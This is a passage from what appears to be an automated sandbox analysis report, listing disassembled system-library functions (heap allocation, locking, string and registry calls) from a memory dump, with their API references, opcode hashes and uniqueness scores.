                                                                                                                              • Part of subcall function 6B1D52A5: RtlLeaveCriticalSection.1105(6B2C79A0,6B2C79A0,?,00000000,?), ref: 6B1D52DD
                                                                                                                            • RtlEqualUnicodeString.1105(?,?,00000001,?,?,?), ref: 6B230CCB
                                                                                                                            • RtlLeaveCriticalSection.1105(6B2C79A0,?,?,?), ref: 6B230CE4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$Leave$EnterEqualStringUnicode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4283003422-0
                                                                                                                            • Opcode ID: 6d4189140ad3fa67b2051f7120bc18f95aa25d9e6766775f4d0b7420234fa75a
                                                                                                                            • Instruction ID: 0d9d998f13eff9a49bafdb16dfd4f45add2c28b07bf95315921ab086b55c8055
                                                                                                                            • Opcode Fuzzy Hash: 6d4189140ad3fa67b2051f7120bc18f95aa25d9e6766775f4d0b7420234fa75a
                                                                                                                            • Instruction Fuzzy Hash: D2115971941215FBCB209F28C4A0BABBBF5EF15B10F1406ABE54593680D73DC842C760
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B203B5A, Relevance: 6.1, APIs: 4, Instructions: 51memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlFreeHeap.1105(?,?,?,6B203AEC,?,?,00000000,?,?,?,?,?,00000000,?,?,00000120), ref: 6B246208
                                                                                                                            • RtlFreeHeap.1105(?,?,?,6B203AEC,?,?,00000000,?,?,?,?,?,00000000,?,?,00000120), ref: 6B24622C
                                                                                                                            • RtlFreeHeap.1105(?,?,?,6B203AEC,?,?,00000000,?,?,?,?,?,00000000,?,?,00000120), ref: 6B246250
                                                                                                                            • RtlFreeHeap.1105(?,?,00000000,6B203AEC,?,?,00000000,?,?,?,?,?,00000000,?,?,00000120), ref: 6B24626D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3298025750-0
                                                                                                                            • Opcode ID: a547362e55989ee62c9748379ca94d80cc1b92e762c660f7f1df9b8767859172
                                                                                                                            • Instruction ID: 5bd4da6d2bebda4109f77490c8d49d47cb0ce8a2b121f36c7c75fffcf56be228
                                                                                                                            • Opcode Fuzzy Hash: a547362e55989ee62c9748379ca94d80cc1b92e762c660f7f1df9b8767859172
                                                                                                                            • Instruction Fuzzy Hash: 20112836551954AFCF6ADB59CA84F6A73F9FB08604F0501A8E409A7752C72CEC01CB94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1DA745, Relevance: 6.0, APIs: 4, Instructions: 46memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(?,?,00000000,?,6B20DFD8,00000000,?,?,?,?,?,6B1D3DAD,?,00000000,6B2AF4D0,00000084), ref: 6B1DA757
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?,?,?,00000000,?,6B20DFD8,00000000,?,?,?,?,?,6B1D3DAD,?,00000000,6B2AF4D0), ref: 6B1DA774
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?,?,?,00000000,?,6B20DFD8,00000000,?,?,?,?,?,6B1D3DAD,?,00000000,6B2AF4D0), ref: 6B23442E
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,?,?,?,00000000,?,6B20DFD8,00000000,?,?,?,?,?,6B1D3DAD), ref: 6B23443F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$Release$AcquireFreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2563869513-0
                                                                                                                            • Opcode ID: 0671be6c1ae5754f8304256ea38e0f5c308413868425088f0822e05334f7f52e
                                                                                                                            • Instruction ID: 2da11636796605686882360cf1aa8d5dd8a09eb3e4ed914f4671cf2bd64839da
                                                                                                                            • Opcode Fuzzy Hash: 0671be6c1ae5754f8304256ea38e0f5c308413868425088f0822e05334f7f52e
                                                                                                                            • Instruction Fuzzy Hash: 2A01F772541605ABC360DB3DDC45E11B7ECEB42315B0582AAE6188F391CB39DC02CBE0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B27EB8A, Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 599timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlDebugPrintTimes.1105(?,?,?,?,?,6B292783,00000001,?,00000000,?,?,?,?,6B22FC15), ref: 6B27EBB6
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,?,?,6B292783,00000001), ref: 6B27F23E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentDebugPrintServiceSessionTimes
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 358024996-2766056989
                                                                                                                            • Opcode ID: dd5088dc770c50e6f4a868ed394ec56c035b4661c235e94643138c2c59e41ef3
                                                                                                                            • Instruction ID: 1d9e8f440836f57ab7ddf05a2968c73c957ab556aff33419590b03a4f6838ca4
                                                                                                                            • Opcode Fuzzy Hash: dd5088dc770c50e6f4a868ed394ec56c035b4661c235e94643138c2c59e41ef3
                                                                                                                            • Instruction Fuzzy Hash: 6632067462869A8BD734EF29C0C07B2B7E4BF05705F0484AAD8958F6C5D33DE452CBA9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B210E21, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000000,00000618,?,?), ref: 6B210EDA
                                                                                                                            • RtlRaiseException.1105 ref: 6B24CC58
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateExceptionHeapRaise
                                                                                                                            • String ID: Flst
                                                                                                                            • API String ID: 3789339297-2374792617
                                                                                                                            • Opcode ID: 4c4a88b97342b489f3c55c9dc942007b1e869d0034826ff44a9d1cde0fb394d3
                                                                                                                            • Instruction ID: e9512de0f4a4292af1555cb1188a8748a347dbd4acc52359e61087ad60cb0b5a
                                                                                                                            • Opcode Fuzzy Hash: 4c4a88b97342b489f3c55c9dc942007b1e869d0034826ff44a9d1cde0fb394d3
                                                                                                                            • Instruction Fuzzy Hash: C44198B160930ACFC704CF19C5C0A16BBE4EB49B10F1086AEE659CB281DB35D846CB92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D2240, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99memorytimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000000,00000034,?,?,?,?,?,?,?,?,?,6B2AF350,0000004C), ref: 6B1D22AC
                                                                                                                            • TpAllocTimer.1105(00000020,6B2A9440,00000000,00000003,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 6B1D235A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocAllocateHeapTimer
                                                                                                                            • String ID: (
                                                                                                                            • API String ID: 2926205940-3887548279
                                                                                                                            • Opcode ID: 03c8bc76becf0a9151e91ae5a24aa0c672afe19bca75ecb05d8083b0fb8d8f40
                                                                                                                            • Instruction ID: 478718e6011dfa8c6a48e834d6e2ea65229d8ff6bf35b7edf41ad4efc9ca93c1
                                                                                                                            • Opcode Fuzzy Hash: 03c8bc76becf0a9151e91ae5a24aa0c672afe19bca75ecb05d8083b0fb8d8f40
                                                                                                                            • Instruction Fuzzy Hash: F14104B0E10759EFCB04CFA8D580ACDBBB9BF0C714F10425AE454A7641C7B99A51CFA4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D66D4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlInitUnicodeString.1105(?,UBR,00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 6B1D66F5
                                                                                                                            • ZwQueryValueKey.1105(?,?,00000002,?,00000014,?,?,UBR,00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 6B1D670B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: InitQueryStringUnicodeValue
                                                                                                                            • String ID: UBR
                                                                                                                            • API String ID: 3766860702-3525060630
                                                                                                                            • Opcode ID: bd325b4e86a2fe92519981afa4e781ff5c1b0b876756b1ab38af06fa005393bd
                                                                                                                            • Instruction ID: d17ea55585f94756d5b62421c7f55fd3400900836f2d53dc1b38b2f6fb751b92
                                                                                                                            • Opcode Fuzzy Hash: bd325b4e86a2fe92519981afa4e781ff5c1b0b876756b1ab38af06fa005393bd
                                                                                                                            • Instruction Fuzzy Hash: 05012CB1A4811EEFDB00CAA5C8459EFB7FCEB49716F104166EA05E7140D738AE45C7A2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B288DF1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DbgPrintEx.1105(00000065,00000000,Critical error detected %lx,?,6B2B0D50,00000074,6B2920A2,?,?,6B28FFAF,00000001,00000020,6B2C58C0,00000000), ref: 6B288E2A
                                                                                                                            • RtlRaiseException.1105(?), ref: 6B288E74
                                                                                                                            Strings
                                                                                                                            • Critical error detected %lx, xrefs: 6B288E21
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionPrintRaise
                                                                                                                            • String ID: Critical error detected %lx
                                                                                                                            • API String ID: 1813208005-802127002
                                                                                                                            • Opcode ID: dd8713fa5a10bbb408a4480009d30e0c1af8c16b88a4424e046daff1a25e5e30
                                                                                                                            • Instruction ID: 5410b7d1e521dfb6cb50d4ea398a4d6c081dfbe78dcb05ef1d8e1ff36a905b2b
                                                                                                                            • Opcode Fuzzy Hash: dd8713fa5a10bbb408a4480009d30e0c1af8c16b88a4424e046daff1a25e5e30
                                                                                                                            • Instruction Fuzzy Hash: D5113971C5434CDBDB15CFB8858679DBBF0AB04355F20825DE568AB2D2C7384606CF14
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B202990, Relevance: 4.6, APIs: 3, Instructions: 133COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlEnterCriticalSection.1105(?,6B2AFF00,00000020,6B20251C,?,?,?,?,?,?,00000000,0000000E,00000000), ref: 6B202A09
                                                                                                                            • _wcsnicmp.1105(?,?,00000001,6B2AFF00,00000020,6B20251C,?,?,?,?,?,?,00000000,0000000E,00000000), ref: 6B202A7F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalEnterSection_wcsnicmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2198911780-0
                                                                                                                            • Opcode ID: 09435f10f3c98b7b4f69596653f725a05e88c7edf97727aad0e4c15792c09fe1
                                                                                                                            • Instruction ID: d3f86a96b338475bd64993f142e29831f95aa1eadb3c3eb09271336ab2b11b7a
                                                                                                                            • Opcode Fuzzy Hash: 09435f10f3c98b7b4f69596653f725a05e88c7edf97727aad0e4c15792c09fe1
                                                                                                                            • Instruction Fuzzy Hash: 4A5168B190021EEFCF15CF58C880ACEBBF5BF08714F118156E910AB260CB398992DFA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1E3BF4, Relevance: 4.6, APIs: 3, Instructions: 113memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,00000000,000000AA,00000000,?,00000000), ref: 6B1E3CB4
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,00AA0000,00AA0000,000000AA,00000000,?,00000000), ref: 6B1E3CDE
                                                                                                                            • RtlLCIDToCultureName.1105(00AA0000,00AA0000,000000AA,00000000,?,00000000), ref: 6B1E3D0A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocateCultureFreeName
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 485255109-0
                                                                                                                            • Opcode ID: f39b698ccc4ce1347c4269f939e151f0c7cf1e1e3d787b0dec88b1477ed6567f
                                                                                                                            • Instruction ID: 5a06316cb3977e72995c64d7a8c81b5a8db9e9be97f9b32467fb8894095cc860
                                                                                                                            • Opcode Fuzzy Hash: f39b698ccc4ce1347c4269f939e151f0c7cf1e1e3d787b0dec88b1477ed6567f
                                                                                                                            • Instruction Fuzzy Hash: 1C315B71608B51ABD722CE29D440B57B7D4BB85B51F01456BF894CB2A0D33CC843C7B2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B213D43, Relevance: 4.6, APIs: 3, Instructions: 106memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000000,00000022,00000024,00000000,?,?,01000000,00000000), ref: 6B213D84
                                                                                                                            • RtlAppendUnicodeStringToString.1105(00000000,6B1B11C4,00000024,00000000,?,?,01000000,00000000), ref: 6B213DA3
                                                                                                                              • Part of subcall function 6B1E7B60: memmove.1105(?,?,00000024,00000022,00000000,00000024,00000000,?,6B213DA8,00000000,6B1B11C4,00000024,00000000,?,?,01000000), ref: 6B1E7B9D
                                                                                                                            • RtlAppendUnicodeStringToString.1105(00000000,01000000,00000000,6B1B11C4,00000024,00000000,?,?,01000000,00000000), ref: 6B213DC4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: String$AppendUnicode$AllocateHeapmemmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 400542772-0
                                                                                                                            • Opcode ID: af4ca8560c20c0aa068e60ba875f87223d3403ecf7545ed1f0ab83fa48bb6177
                                                                                                                            • Instruction ID: a884928429fb17a9f24dd78874e90492360f57eb14ee91553a4f8cfb7b2cede4
                                                                                                                            • Opcode Fuzzy Hash: af4ca8560c20c0aa068e60ba875f87223d3403ecf7545ed1f0ab83fa48bb6177
                                                                                                                            • Instruction Fuzzy Hash: 0531B031A18619EBD738CF2DC881A6BBBF6FF45B1170580AAE945CB790E738D841C790
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B28E33D, Relevance: 4.6, APIs: 3, Instructions: 89memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memcpy.1105(?,00000001,00000000,?,?,00000000,?,00000000,?,00000000), ref: 6B28E3E4
                                                                                                                            • memcpy.1105(?,6B1B4F84,00000000,00000000,?,00000000), ref: 6B28E3F5
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,?,?,?,00000000,?,00000000), ref: 6B28E41F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy$FreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4250714341-0
                                                                                                                            • Opcode ID: 81db0b4a4f51517f14ab83b691b10da23eda5927299be272d2968c9eadfe60ba
                                                                                                                            • Instruction ID: 88a5675bbc8e03770e071f08a771cbc6329beb580f45480b61a4c2eb68c6936b
                                                                                                                            • Opcode Fuzzy Hash: 81db0b4a4f51517f14ab83b691b10da23eda5927299be272d2968c9eadfe60ba
                                                                                                                            • Instruction Fuzzy Hash: A9216D36610A9977DB24ABA59881ABBB7F5EF40710F00801AF96D875D1E738ED44C361
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20E730, Relevance: 4.6, APIs: 3, Instructions: 89memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ZwQueryInformationProcess.1105(000000FF,00000024,FFFFFFFE,00000004,00000000,?,?,6B26FF7D,6B2B09B0,00000014,6B1EEBD8,?,?,?,00000000), ref: 6B20E742
                                                                                                                            • RtlRaiseStatus.1105(00000000,000000FF,00000024,FFFFFFFE,00000004,00000000,?,?,6B26FF7D,6B2B09B0,00000014,6B1EEBD8,?,?,?,00000000), ref: 6B20E765
                                                                                                                            • RtlAllocateHeap.1105(?,?,?,?,FFFFFFFE,?,?,00000000,000000FF,00000024,FFFFFFFE,00000004,00000000,?,?,6B26FF7D), ref: 6B20E7A3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeapInformationProcessQueryRaiseStatus
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1560743067-0
                                                                                                                            • Opcode ID: 355ef504978738ee2e8088237ef063bc88923e19b98a3a6e2bee59f6915ab751
                                                                                                                            • Instruction ID: 72b51fa6efdbbd94249b3a960f963aee9bd01cfaadcbff99e44c425a3acd121a
                                                                                                                            • Opcode Fuzzy Hash: 355ef504978738ee2e8088237ef063bc88923e19b98a3a6e2bee59f6915ab751
                                                                                                                            • Instruction Fuzzy Hash: 33318F75A64249AFD744DF68C881F8AB7E4FB09314F148256F908CB351D739E980CBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20BC2C, Relevance: 4.6, APIs: 3, Instructions: 88memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(?,00000030,00000000,-00000001,6B1EF875,00000000,00000000,00000000,00000001,-00000001), ref: 6B20BC79
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?,?,00000030,00000000,-00000001,6B1EF875,00000000,00000000,00000000,00000001,-00000001), ref: 6B20BC8D
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,000000D0,?,?,00000030,00000000,-00000001,6B1EF875,00000000,00000000,00000000,00000001,-00000001), ref: 6B20BCA6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireAllocateHeapRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 614792542-0
                                                                                                                            • Opcode ID: 0851d2549a8348c5941a33c5d182e5ea58eb4b00741acfba8101ba9f6586bc60
                                                                                                                            • Instruction ID: a4dffd4504563a15908582f74d093d4b26a2dc2c81e8d6f23aceadd510fcc8c3
                                                                                                                            • Opcode Fuzzy Hash: 0851d2549a8348c5941a33c5d182e5ea58eb4b00741acfba8101ba9f6586bc60
                                                                                                                            • Instruction Fuzzy Hash: 2331D136A1061A9FCB92DF58C4C47A6B3F4FB1A311F000175EC58EB241EB79D905CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2190AF, Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,00000066,00000066,00000000,00000000,00000000,00000000,00000066,00000000), ref: 6B2190F5
                                                                                                                            • memcpy.1105(00000010,00000000,00000066,00000008,00000066,00000066,00000000,00000000,00000000,00000000,00000066,00000000), ref: 6B21910B
                                                                                                                            • RtlCompareMemory.1105(00000010,?,00000066,00000000,00000000,00000000,00000000,00000066,00000000), ref: 6B2514DF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateCompareHeapMemorymemcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2355910289-0
                                                                                                                            • Opcode ID: 5bee6fe65456da6c020b91007c3b28e6621704686b2fe6c1a2c83c2b708ddb54
                                                                                                                            • Instruction ID: 4a07d684abbb8791b4e9c742966961cabb238ef446d5198a72a849c0484a5c2f
                                                                                                                            • Opcode Fuzzy Hash: 5bee6fe65456da6c020b91007c3b28e6621704686b2fe6c1a2c83c2b708ddb54
                                                                                                                            • Instruction Fuzzy Hash: F721C571A44209EFDB20CF58C8C4E5AF7F8EF44710F1088AAEA4497241D334ED51CB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1E28FD, Relevance: 4.6, APIs: 3, Instructions: 59COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlLeaveCriticalSection.1105(6B2C5350,00000000,?,6B2C84D8,?,?,6B1E0936,00000000,?,6B2C84D8,?,6B2C84D8,?,00000000,?,?), ref: 6B1E290D
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(6B2C5350,00000000,?,6B2C84D8,?,?,6B1E0936,00000000,?,6B2C84D8,?,6B2C84D8,?,00000000,?,?), ref: 6B1E2923
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B237788
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
